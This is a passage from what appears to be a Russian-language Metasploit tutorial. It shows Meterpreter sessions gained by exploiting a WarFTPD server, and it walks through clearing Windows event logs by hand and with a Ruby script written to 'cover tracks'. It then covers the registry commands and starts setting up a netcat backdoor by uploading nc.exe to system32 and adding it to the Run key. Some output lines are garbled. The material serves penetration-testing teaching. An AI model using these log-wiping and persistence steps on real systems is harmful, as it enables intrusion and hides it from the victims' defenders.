[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 2 opened (172.16.104.130:4444 -> 172.16.104.145:1246)
 
meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client
>> log = client.sys.eventlog.open('system')
=> #<#:0xb6779424 @client=#>, #>, #
 
"windows/browser/facebook_extractiptc"=>#, "windows/antivirus/trendmicro_serverprotect_earthagent"=>#, "windows/browser/ie_iscomponentinstalled"=>#, "windows/exec/reverse_ord_tcp"=>#, "windows/http/apache_chunked"=>#, "windows/imap/novell_netmail_append"=>#

Теперь можно очистить журнал, запустив 'log.clear'.

>> log.clear
=> #<#:0xb6779424 @client=#>,
 
/trendmicro_serverprotect_earthagent"=>#, "windows/browser/ie_iscomponentinstalled"=>#, "windows/exec/reverse_ord_tcp"=>#, "windows/http/apache_chunked"=>#, "windows/imap/novell_netmail_append"=>#

Посмотрим на результат.

eventviewer1

Отлично! Теперь мы можем создать собственный скрипт для очистки логов.

# Clears Windows Event Logs
 
 
evtlogs = [
    'security',
        'system',
        'application',
        'directory service',
        'dns server',
        'file replication service'
    ]
puts ("Clearing Event Logs, this will leave an event 517")
evtlogs.each do |evl|
    puts ("tClearing the #{evl} Event Log")
    log = client.sys.eventlog.open(evl)
    log.clear
end
puts ("All Clear! You are a Ninja!")

После создания скрипта, разместим его в /pentest/exploits/framework3/scripts/meterpreter. «проэксплуатируем» систему повторно и посмотрим работает-ли он.

msf exploit(warftpd_165_user) > exploit
 
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Connecting to FTP server 172.16.104.145:21...
[*] Connected to target FTP server.
[*] Trying target Windows 2000 SP0-SP4 English...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (172.16.104.130:4444 -> 172.16.104.145:1253)
 
meterpreter > run clearlogs
Clearing Event Logs, this will leave an event 517
    Clearing the security Event Log
    Clearing the system Event Log
    Clearing the application Event Log
    Clearing the directory service Event Log
    Clearing the dns server Event Log
    Clearing the file replication service Event Log
All Clear! You are a Ninja!
meterpreter > exit

В логах осталась только одна запись об очистке.

eventviewer2

Это еще одно подтверждение силы Meterpreter. Без особых усилий мы взяли участок кода из другого инструмента и создали собственный скрипт, который поможет замести следы.

Управление реестром.

Реестр Windows это то место в системе, где с помощью нескольких нажатий клавиш вы можете так навредить системе, что она будет совершенно не пригодна для использования.
Поэтому при правке реестра будьте очень осторожны, ошибки могут быть необратимы.
В Meterpreter есть весь необходимый функционал для взаимодействия с реестром, давайте рассмотрим этот функционал.

meterpreter > reg
Usage: reg [command] [options]
 
Interact with the target machine's registry.
 
OPTIONS:
 
    -d   The data to store in the registry value.
    -h   Help menu.
    -k   The registry key path (E.g. HKLM\Software\Foo).
    -t   The registry value type (E.g. REG_SZ).
    -v   The registry value name (E.g. Stuff).
 
COMMANDS:
 
    enumkey    Enumerate the supplied registry key [-k ]
    createkey  Create the supplied registry key  [-k ]
    deletekey  Delete the supplied registry key  [-k ]
    setval     Set a registry value [-k -v -d ]
    deleteval  Delete the supplied registry value [-k -v ]
    queryval   Queries the data contents of a value [-k -v ]

Здесь мы можем видеть много разных вариантов для управления реестром удаленной системы. Мы имеем полный доступ: чтения, записи, создания, удаления ключей реестра. Эти возможности могут быть использованы для разных целей, в том числе для сбора информации об удаленной системе. С помощью реестра можно видеть: какие файлы были открыты, какие веб-сайты посещал пользователь в Internet Explorer, какие программы запускались, USB устройства использовались, ну и т.д.
Существует список, где конкретно находятся интересующие записи в реестре, этот список можно найти по адресу http://www.accessdata.com/media/en_US/print/papers/wp.Registry_Quick_Find_Chart.en_us.pdf, а так-же к вашим услугам весь интернет и поисковые системы.

Закрепляемся с помощью Netcat Backdoor.

В этом примере мы установим netcat backdoor на удаленной системе. Установка также включает изменение в системном реестре и правилах брандмауэра.
Во-первых, мы должны загрузить копию NetCat на удаленную систему.

meterpreter > upload /tmp/nc.exe C:\\windows\\system32
[*] uploading  : /tmp/nc.exe -> C:\windows\system32
[*] uploaded   : /tmp/nc.exe -> C:\windows\system32nc.exe

Затем мы поработаем с реестром, чтобы netcat запускался при старте системы и слушал порт 455. Для этого отредактируем ключ реестра 'HKLM\software\microsoft\windows\currentversion\run'.